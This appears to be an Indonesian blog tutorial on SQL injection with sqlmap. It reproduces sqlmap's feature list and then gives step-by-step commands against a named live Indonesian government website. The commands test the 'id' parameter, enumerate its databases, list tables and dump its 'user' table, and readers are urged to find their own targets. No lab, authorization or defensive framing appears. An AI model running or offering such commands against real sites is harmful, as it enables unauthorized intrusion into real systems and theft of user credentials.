tutorial sql injection menggunakan sqlmap
What Is SQLMAP?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Feature In SQLMAP
- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, Raima Database Manager, YugabyteDB and Virtuoso database management systems.
- Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
- Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
- Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
- Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
- Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
- Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
- Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
- Support for database process' user privilege escalation via Metasploit's Meterpreter
getsystem
command
Apa Itu SQL INJECTION ?
SQL Injection adalah salah satu teknik yang menyalahgunakan celah keamanan yang ada di SQL pada lapisan basis data suatu aplikasi. Celah ini terjadi karena input dari user tidak difilter secara benar dan dalam pembuatannya menggunakan form yang salah. Jadi sampai saat ini SQL Injection masih menjadi favorit hacker untuk melakukan serangan pada website. Apalagi sekarang ini hacking melalui jaringan internet sudah tidak semudah zaman dulu.
Tutorial sql injection menggunakan sqlmap
Untuk melakukan sql injection menggunakan sqlmap yaitu kalian harus meng-install tools nya terlebih dahulu,tools ini menggunakan bahasa pemrograman python dan bisa di jalankan di terminal apa saja termasuk termux
Cara Install sqlmap bisa visit di https://sqlmap.org
Kalau Sudah Meng-install SQLMAP,Kalian Langsung saja mencari target untuk di inject
disini saya menggunakan live target : https://kanimpadang.kemenkumham.go.id/article.php?id=16
dan pastikan website nya vuln sqli ya,dengan cara menambahkan ' di belakang parameter id=16
contoh
https://kanimpadang.kemenkumham.go.id/article.php?id=16'
jika mengalami perubahan seperti eror,itu tanda nya vuln,tapi ga semua nya klo di kasih ' trus eror itu vuln ya
{#}STEP 1
Tentu saja Kalian Harus membuka SQLMAP nya
lalu ketik
python sqlmap.py target.com/paramter.php?id=1337
seperti ini
seperti itu,langkah selanjutnya terserah mau kalian apakan dulu disini ada beberapa command seperti
--dbs
--users
saya akan memakai --dbs
caranya?
python sqlmap.py https://kanimpadang.kemenkumham.go.id/article.php?id=16 --dbs
nah kalo udah kalian enter
nah kek gini,nanti kalo ada pilihan disuruh Y/n itu terserah kalian
kalo udah selsai nanti kek gini
nah klo udah kek gini kalian pilih database yg mau kalian inject
untuk ngedump database,kalian bisa menggunakan command
--tables -D database
contoh
python sqlmap.py https://kanimpadang.kemenkumham.go.id/article.php?id=16 --tables -D web
nah klo udah kek gini tinggal kalian pilih,column mana yg mau kalian dump,kalau saya mau ngedump user
command?
--dump -D database -T column
contoh?
python sqlmap.py https://kanimpadang.kemenkumham.go.id/article.php?id=16 --dump -D web -T user
NOTE : KALO ADA PILIHAN Y/N/Q
KALIAN HARUS MILIH SALAH SATU DAN ITU TERSERAH KALIAN,KALIAN COBA COBA AJA,KARNA GA SEMUA WEB SAMA SECURITY NYA